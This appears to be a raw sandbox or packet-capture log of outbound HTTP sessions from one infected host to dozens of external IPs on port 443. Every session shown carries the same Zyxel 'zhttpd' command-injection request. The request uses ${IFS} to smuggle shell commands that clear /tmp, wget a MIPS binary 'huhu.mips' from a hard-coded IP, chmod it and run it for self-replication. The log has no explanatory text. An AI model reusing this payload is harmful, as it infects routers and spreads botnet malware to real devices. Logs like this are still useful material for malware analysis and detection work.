                                      Jan 19, 2024 17:29:50.144768953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8887192.168.2.143600088.87.199.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.144798994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8888192.168.2.1435726180.222.231.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.144843102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8889192.168.2.1450404148.45.210.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.144879103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8890192.168.2.144354682.99.200.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.144932032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8891192.168.2.1441770178.28.126.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.144959927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8892192.168.2.145814094.120.208.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.145000935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8893192.168.2.145598638.216.124.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.145044088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8894192.168.2.1447302153.237.53.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.139235973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8895192.168.2.1438776173.157.93.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.139295101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8896192.168.2.1456238106.148.93.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.139328957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8897192.168.2.1439550190.89.133.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.139396906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8898192.168.2.1449156168.100.195.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.139444113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8899192.168.2.14502681.170.84.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.139478922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8900192.168.2.1442742140.156.60.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.139507055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8901192.168.2.1440224142.115.47.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.139561892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8902192.168.2.1443822165.93.238.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.139616966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8903192.168.2.1454088187.126.220.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.139667034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8904192.168.2.1451870173.228.84.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.139693975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8905192.168.2.145664619.65.58.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.139729023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8906192.168.2.145813865.98.13.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.139771938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8907192.168.2.145341448.151.174.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.139811039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8908192.168.2.1433496223.253.89.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.139847040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8909192.168.2.144151813.127.191.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.139894962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8910192.168.2.1453840196.35.177.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.139940977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8911192.168.2.144235262.14.72.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.139960051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8912192.168.2.1446230154.167.7.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.140077114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8913192.168.2.1436142192.23.167.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.140115976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8914192.168.2.1434490200.101.129.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.140166044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8915192.168.2.1437796147.112.243.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.140181065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8916192.168.2.1445914106.195.130.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.140254021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8917192.168.2.143622862.96.231.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.140290976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8918192.168.2.1432774203.93.213.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.140321970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8919192.168.2.1435408124.79.143.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.140353918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8920192.168.2.143720819.239.75.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.140403986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8921192.168.2.145199265.10.198.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.140439034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8922192.168.2.1448678189.209.33.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.140465975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8923192.168.2.144183220.89.172.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.140512943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8924192.168.2.1437810220.121.207.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.140548944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8925192.168.2.1452472205.41.39.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.140594006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8926192.168.2.1435048163.155.22.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.140633106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8927192.168.2.14564181.6.2.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.140671015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8928192.168.2.1439870118.61.89.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.140717030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8929192.168.2.144849858.115.242.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.140741110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8930192.168.2.1460592104.7.240.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.140778065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8931192.168.2.1434998133.138.132.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.140840054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8932192.168.2.1456184161.120.49.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.140870094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8933192.168.2.1441910140.197.95.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.140909910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8934192.168.2.145520069.88.196.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.140953064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8935192.168.2.145300084.82.80.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.140975952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8936192.168.2.1442180164.150.124.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141012907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8937192.168.2.1455786122.68.111.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141043901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8938192.168.2.1443542209.27.99.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141073942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8939192.168.2.144941445.156.210.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141113997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8940192.168.2.1433826101.211.157.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141159058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8941192.168.2.143873689.61.66.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141186953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8942192.168.2.1456668173.189.178.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141222954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8943192.168.2.14406689.173.106.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141254902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8944192.168.2.1443620109.69.172.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141297102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8945192.168.2.144789270.148.232.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141330957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8946192.168.2.1444554112.126.159.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141369104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8947192.168.2.144769446.7.84.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141415119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8948192.168.2.1449620124.252.2.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141460896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8949192.168.2.14448464.235.95.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141482115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8950192.168.2.144221653.8.35.11443
                                      TimestampBytes transferredDirectionData
